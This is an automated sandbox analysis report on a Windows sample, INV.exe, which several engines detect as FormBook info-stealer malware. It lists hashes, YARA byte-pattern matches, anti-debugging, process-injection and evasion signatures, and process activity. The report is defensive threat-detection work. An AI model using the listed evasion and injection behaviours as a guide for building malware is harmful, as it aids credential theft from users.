Analysis Report INV.exe

Overview

General Information

Sample Name: INV.exe
Analysis ID: 323458
MD5: 83259cb82642666503278233421c306d
SHA1: 180e81bab341eda0d404b8f5fed93bc3b350cfbd
SHA256: 6e28207e7a3ef7f173d7a7905208a55ff0ad1eb645241e2e9ae453c643cf3a31
Tags: exe

Detection

FormBook
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • INV.exe (PID: 6580 cmdline: 'C:\Users\user\Desktop\INV.exe' MD5: 83259CB82642666503278233421C306D)
    • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • INV.exe (PID: 6640 cmdline: C:\Users\user\Desktop\INV.exe MD5: 83259CB82642666503278233421C306D)
      • WerFault.exe (PID: 6752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 872 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x1ac18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x1ae92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x269b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x264a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x26ab7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x26c2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x1b8aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x2571c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1c5a3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x2c827:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x2d82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x29749:$sqlite3step: 68 34 1C 7B E1
    • 0x2985c:$sqlite3step: 68 34 1C 7B E1
    • 0x29778:$sqlite3text: 68 38 2A 90 C5
    • 0x2989d:$sqlite3text: 68 38 2A 90 C5
    • 0x2978b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x298b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9050:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x92ca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14ded:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x148d9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14eef:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15067:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x9ce2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x13b54:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa9db:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ac5f:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bc62:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      2.2.INV.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        2.2.INV.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x1e940:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x1ebba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x2a6dd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x2a1c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x2a7df:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x2a957:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x1f5d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x29444:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x202cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x3054f:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x31552:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.INV.exe.400000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x2d471:$sqlite3step: 68 34 1C 7B E1
        • 0x2d584:$sqlite3step: 68 34 1C 7B E1
        • 0x2d4a0:$sqlite3text: 68 38 2A 90 C5
        • 0x2d5c5:$sqlite3text: 68 38 2A 90 C5
        • 0x2d4b3:$sqlite3blob: 68 53 D8 7F 8C
        • 0x2d5db:$sqlite3blob: 68 53 D8 7F 8C
        2.2.INV.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          2.2.INV.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x1ad40:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x1afba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x26add:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x265c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x26bdf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x26d57:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x1b9d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x25844:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x1c6cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x2c94f:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x2d952:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Antivirus / Scanner detection for submitted sample
          Source: INV.exe | Avira: detected
          Multi AV Scanner detection for submitted file
          Source: INV.exe | Virustotal: Detection: 36%
          Yara detected FormBook
          Source: Yara match | File source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: INV.exe | Joe Sandbox ML: detected
          Source: 2.2.INV.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.INV.exe.90000.0.unpack | Avira: Label: TR/Crypt.EPACK.Gen2
          Source: 2.0.INV.exe.90000.0.unpack | Avira: Label: ADWARE/MultiPlug.Gen7
          Source: 0.0.INV.exe.90000.0.unpack | Avira: Label: ADWARE/MultiPlug.Gen7
          Source: 2.2.INV.exe.90000.0.unpack | Avira: Label: ADWARE/MultiPlug.Gen7
          Source: C:\Users\user\Desktop\INV.exe | Code function: 2_2_00404A29 FindFirstFileExW
          Source: C:\Users\user\Desktop\INV.exe | Code function: 4x nop then pop ebx | 0_2_000C9E2B

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\INV.exe | Code function: String function: 000932A1 appears 54 times
          Source: C:\Users\user\Desktop\INV.exe | Code function: String function: 000927F0 appears 60 times
          Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 872
          Source: INV.exe, 00000000.00000003.644161326.0000000002526000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs INV.exe
          Source: INV.exe, 00000002.00000002.668878228.0000000004D50000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs INV.exe
          Source: INV.exe, 00000002.00000002.668934607.0000000004DC0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs INV.exe
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: sfc.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: phoneinfo.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: ext-ms-win-xblauth-console-l1.dll
          Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal80.troj.evad.winEXE@5/4@0/0
          Source: C:\Users\user\Desktop\INV.exe | Code function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6640
          Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER54C8.tmp
          Source: INV.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\INV.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\INV.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: INV.exe | Virustotal: Detection: 36%
          Source: unknown | Process created: C:\Users\user\Desktop\INV.exe 'C:\Users\user\Desktop\INV.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 872
          Source: C:\Users\user\Desktop\INV.exe | Process created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: C:\Users\user\Desktop\INV.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: INV.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wintrust.pdbJ source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.650985591.00000000046CD000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000005.00000003.653962430.0000000004CA0000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INV.exe, 00000000.00000003.644532557.0000000002410000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
          Source: Binary string: .ni.pdb source: WerFault.exe, 00000005.00000003.654329781.00000000049C2000.00000004.00000001.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.654358886.0000000004B90000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.654358886.0000000004B90000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.654358886.0000000004B90000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp, WER54C8.tmp.dmp.5.dr
          Source: Binary string: mscoree.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.654358886.0000000004B90000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdbUGP source: INV.exe, 00000000.00000003.644532557.0000000002410000.00000004.00000001.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER54C8.tmp.dmp.5.dr
          Source: Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000005.00000003.653962430.0000000004CA0000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.654358886.0000000004B90000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000005.00000003.653962430.0000000004CA0000.00000004.00000001.sdmp, WER54C8.tmp.dmp.5.dr
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.654362368.0000000004B94000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdbk source: WerFault.exe, 00000005.00000003.654362368.0000000004B94000.00000004.00000040.sdmp
          Source: Binary string: combase.pdbk source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
          Source: Binary string: .pdbEE source: WerFault.exe, 00000005.00000003.654329781.00000000049C2000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
          Source: INV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: INV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: INV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: INV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: INV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000B21EE push ecx; ret 0_2_000B2201
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000DF402 push eax; ret 0_2_000DF408
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000DF46C push eax; ret 0_2_000DF472
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000D05B2 pushfd ; retf 0_2_000D05ED
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_00092835 push ecx; ret 0_2_00092848
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000D8864 push edx; retf 0_2_000D8884
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000C9A9E push ss; ret 0_2_000C9AEC
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000C9B83 push es; ret 0_2_000C9B93
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000C6C15 push eax; iretd 0_2_000C6C16
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000D8C60 push ds; retf 0_2_000D8C61
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000AEDC0 push eax; ret 0_2_000AEE21
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000AEE70 push eax; ret 0_2_000AEE21
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000D8F2B push ecx; ret 0_2_000D8F33
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000D8F24 push ecx; ret 0_2_000D8F33
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_00092835 push ecx; ret 2_2_00092848
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_00401F16 push ecx; ret 2_2_00401F29
